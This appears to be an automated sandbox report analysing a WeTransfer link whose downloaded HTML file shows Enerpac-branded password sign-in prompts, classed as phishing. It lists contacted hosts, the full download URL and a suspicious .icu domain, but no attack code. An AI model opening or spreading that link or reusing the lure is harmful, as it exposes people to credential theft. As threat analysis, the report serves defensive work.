                                                                                                                                                                                                              d162h6x3rxav67.cloudfront.netUnited States
                                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                              18.66.112.50
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                              142.250.185.193
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              108.138.6.136
                                                                                                                                                                                                              d1ykf07e75w7ss.cloudfront.netUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              44.213.140.1
                                                                                                                                                                                                              rtb.adentifi.comUnited States
                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                              unknownReserved
                                                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                                                              172.217.23.102
                                                                                                                                                                                                              ad.doubleclick.netUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              142.250.185.194
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              184.28.89.220
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                                                                              142.250.186.142
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              152.199.21.175
                                                                                                                                                                                                              sni1gl.wpc.upsiloncdn.netUnited States
                                                                                                                                                                                                              15133EDGECASTUSfalse
                                                                                                                                                                                                              35.244.174.68
                                                                                                                                                                                                              di.rlcdn.comUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              151.101.192.84
                                                                                                                                                                                                              dualstack.pinterest.map.fastly.netUnited States
                                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                                              18.200.53.175
                                                                                                                                                                                                              ds-pr-bh.ybp.gysm.yahoodns.netUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              108.138.26.38
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              52.24.157.58
                                                                                                                                                                                                              dt-external-521234871.us-west-2.elb.amazonaws.comUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              216.58.206.34
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              52.48.208.18
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              142.250.185.166
                                                                                                                                                                                                              s0.2mdn.netUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              18.134.84.24
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              157.240.0.6
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                                                                                                              64.233.166.84
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              46.228.164.13
                                                                                                                                                                                                              d-ams1.turn.comUnited Kingdom
                                                                                                                                                                                                              56396TURNGBfalse
                                                                                                                                                                                                              13.33.187.87
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              150.171.30.10
                                                                                                                                                                                                              ax-0001.ax-dc-msedge.netUnited States
                                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                              13.33.187.85
                                                                                                                                                                                                              d8ghbpr3r4dzt.cloudfront.netUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              142.250.186.132
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              99.83.205.94
                                                                                                                                                                                                              p.tvpixel.comUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              54.217.172.44
                                                                                                                                                                                                              bsp-proxy.wetransfer.netUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              185.89.210.46
                                                                                                                                                                                                              ib.anycast.adnxs.comGermany
                                                                                                                                                                                                              29990ASN-APPNEXUSfalse
                                                                                                                                                                                                              52.48.211.82
                                                                                                                                                                                                              simple-redirect-eu-west-1-kaas-blue.sre.nielsen.comUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              150.171.27.10
                                                                                                                                                                                                              ax-0001.ax-msedge.netUnited States
                                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                              142.250.181.226
                                                                                                                                                                                                              googleads.g.doubleclick.netUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              18.245.46.51
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              52.48.5.216
                                                                                                                                                                                                              ekstrom.wetransfer.netUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              13.33.219.205
                                                                                                                                                                                                              www.datadoghq-browser-agent.comUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              188.114.96.3
                                                                                                                                                                                                              low0qsz1te4er83672235911c6a3.fanaticsretailgroupindividual.icuEuropean Union
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              75.2.57.54
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              52.214.78.21
                                                                                                                                                                                                              firewall-external-2134955858.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              209.204.225.54
                                                                                                                                                                                                              a2372.casalemedia.comCanada
                                                                                                                                                                                                              27381CASALE-MEDIACAfalse
                                                                                                                                                                                                              142.250.185.98
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              104.18.187.31
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              52.48.47.179
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              18.245.86.118
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              107.20.123.147
                                                                                                                                                                                                              dt-external-217593033.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                              13.32.121.46
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              34.102.204.67
                                                                                                                                                                                                              api.pico.bendingspoonsapps.comUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              154.54.250.80
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              26558FREEWHEELUSfalse
                                                                                                                                                                                                              143.204.98.51
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              151.101.66.137
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                                              142.250.184.225
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              142.250.184.228
                                                                                                                                                                                                              www.google.comUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              34.240.255.32
                                                                                                                                                                                                              auth-session-caching.wetransfer.netUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              3.33.220.150
                                                                                                                                                                                                              match.adsrvr.orgUnited States
                                                                                                                                                                                                              8987AMAZONEXPANSIONGBfalse
                                                                                                                                                                                                              13.32.27.84
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              7018ATT-INTERNET4USfalse
                                                                                                                                                                                                              18.245.60.84
                                                                                                                                                                                                              download.wetransfer.comUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              108.138.26.29
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              34.96.71.22
                                                                                                                                                                                                              s.dsp-prod.demandbase.comUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              185.89.210.122
                                                                                                                                                                                                              unknownGermany
                                                                                                                                                                                                              29990ASN-APPNEXUSfalse
                                                                                                                                                                                                              104.18.95.41
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              104.18.36.155
                                                                                                                                                                                                              ssum-sec.casalemedia.comUnited States
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              104.18.38.76
                                                                                                                                                                                                              js-sec.indexww.comUnited States
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              13.33.187.50
                                                                                                                                                                                                              experiments.wetransfer.comUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              18.245.162.11
                                                                                                                                                                                                              nolan.wetransfer.netUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              185.64.191.214
                                                                                                                                                                                                              imagsync-lhrpairbc.pubmatic.comUnited Kingdom
                                                                                                                                                                                                              62713AS-PUBMATICUSfalse
                                                                                                                                                                                                              188.114.97.3
                                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              64.202.112.223
                                                                                                                                                                                                              nydc1.outbrain.orgUnited States
                                                                                                                                                                                                              22075AS-OUTBRAINUSfalse
                                                                                                                                                                                                              172.217.16.194
                                                                                                                                                                                                              cm.g.doubleclick.netUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              18.245.46.38
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              52.223.40.198
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              8987AMAZONEXPANSIONGBfalse
                                                                                                                                                                                                              172.217.16.198
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              216.58.206.70
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              13.32.121.100
                                                                                                                                                                                                              dna8twue3dlxq.cloudfront.netUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              104.26.1.90
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              18.245.86.84
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              54.170.178.201
                                                                                                                                                                                                              match.prod.bidr.ioUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              18.172.103.101
                                                                                                                                                                                                              dg2iu7dxxehbo.cloudfront.netUnited States
                                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                              54.205.46.242
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                              IP
                                                                                                                                                                                                              192.168.2.16
                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1545583
                                                                                                                                                                                                              Start date and time:2024-10-30 17:37:00 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                              Sample URL:https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utm
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:15
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              Analysis Mode:stream
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal68.phis.win@33/7@310/1024
                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.186.142, 64.233.166.84, 34.104.35.123, 199.232.210.172
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                              • VT rate limit hit for: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utm
                                                                                                                                                                                                              InputOutput
                                                                                                                                                                                                              URL: Model: claude-3-5-sonnet-latest
                                                                                                                                                                                                              {
                                                                                                                                                                                                                  "typosquatting": false,
                                                                                                                                                                                                                  "unusual_query_string": false,
                                                                                                                                                                                                                  "suspicious_tld": false,
                                                                                                                                                                                                                  "ip_in_url": false,
                                                                                                                                                                                                                  "long_subdomain": false,
                                                                                                                                                                                                                  "malicious_keywords": false,
                                                                                                                                                                                                                  "encoded_characters": false,
                                                                                                                                                                                                                  "redirection": false,
                                                                                                                                                                                                                  "contains_email_address": false,
                                                                                                                                                                                                                  "known_domain": true,
                                                                                                                                                                                                                  "brand_spoofing_attempt": false,
                                                                                                                                                                                                                  "third_party_hosting": false
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: URL: https://wetransfer.com
                                                                                                                                                                                                              URL: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiOD Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                                                "trigger_text": "We use cookies and similar methods to recognize visitors and remember their preferences.",
                                                                                                                                                                                                                "prominent_button_name": "unknown",
                                                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiOD Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                                                "trigger_text": "We're nearly ready... Preparing...",
                                                                                                                                                                                                                "prominent_button_name": "Download",
                                                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiOD Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "brands": [
                                                                                                                                                                                                                  "We"
                                                                                                                                                                                                                ]
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiOD Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "brands": [
                                                                                                                                                                                                                  "We"
                                                                                                                                                                                                                ]
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiOD Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                                                "trigger_text": "Your download has started",
                                                                                                                                                                                                                "prominent_button_name": "Send a file?",
                                                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiOD Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                                                "trigger_text": "Your download has started",
                                                                                                                                                                                                                "prominent_button_name": "Send a file?",
                                                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.html Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                                                "trigger_text": "Verifying...",
                                                                                                                                                                                                                "prominent_button_name": "unknown",
                                                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.html Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                                                "trigger_text": "Verifying...",
                                                                                                                                                                                                                "prominent_button_name": "unknown",
                                                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiOD Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "brands": [
                                                                                                                                                                                                                  "We"
                                                                                                                                                                                                                ]
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiOD Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "brands": [
                                                                                                                                                                                                                  "We"
                                                                                                                                                                                                                ]
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.html Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "brands": [
                                                                                                                                                                                                                  "Cloudflare"
                                                                                                                                                                                                                ]
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.html Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "brands": [
                                                                                                                                                                                                                  "Cloudflare"
                                                                                                                                                                                                                ]
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.html Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                                                "trigger_text": "Sign in to continue",
                                                                                                                                                                                                                "prominent_button_name": "Sign in",
                                                                                                                                                                                                                "text_input_field_labels": [
                                                                                                                                                                                                                  "Password"
                                                                                                                                                                                                                ],
                                                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.html Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                                                "trigger_text": "Sign in to continue",
                                                                                                                                                                                                                "prominent_button_name": "Sign in",
                                                                                                                                                                                                                "text_input_field_labels": [
                                                                                                                                                                                                                  "Password"
                                                                                                                                                                                                                ],
                                                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.html Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "brands": [
                                                                                                                                                                                                                  "Hydratight"
                                                                                                                                                                                                                ]
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.html Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "brands": [
                                                                                                                                                                                                                  "Hydratight"
                                                                                                                                                                                                                ]
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.html Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                                                "trigger_text": "Enter password",
                                                                                                                                                                                                                "prominent_button_name": "Sign in",
                                                                                                                                                                                                                "text_input_field_labels": [
                                                                                                                                                                                                                  "Enter password"
                                                                                                                                                                                                                ],
                                                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.html Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "brands": [
                                                                                                                                                                                                                  "ENERPAC",
                                                                                                                                                                                                                  "TOOL GROUP"
                                                                                                                                                                                                                ]
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.html Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                                                "trigger_text": "Sign in to continue",
                                                                                                                                                                                                                "prominent_button_name": "Sign in",
                                                                                                                                                                                                                "text_input_field_labels": [
                                                                                                                                                                                                                  "Password"
                                                                                                                                                                                                                ],
                                                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                                                              }
                                                                                                                                                                                                              URL: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.html Model: claude-3-haiku-20240307
                                                                                                                                                                                                              ```json
                                                                                                                                                                                                              {
                                                                                                                                                                                                                "brands": [
                                                                                                                                                                                                                  "ENERPAC TOOL GROUP"
                                                                                                                                                                                                                ]
                                                                                                                                                                                                              }
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 15:37:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2673
                                                                                                                                                                                                              Entropy (8bit):3.9926132722129397
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:40E6171577DCB1FD023EA421780FF8CB
                                                                                                                                                                                                              SHA1:8CA962A6D93FCD0572CB341C048870797E8455D1
                                                                                                                                                                                                              SHA-256:F14B0710FE87E862B01B25373257DEEDA61960701A2809A69084A36550C4EF81
                                                                                                                                                                                                              SHA-512:426478FA98785861D002D81CBB696D0E911944F7A7214331EBDDB4224577D09538B8D057C5BB674439FA1F1AF27E19F8774C328F145FDB753C91765CF1275AE6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
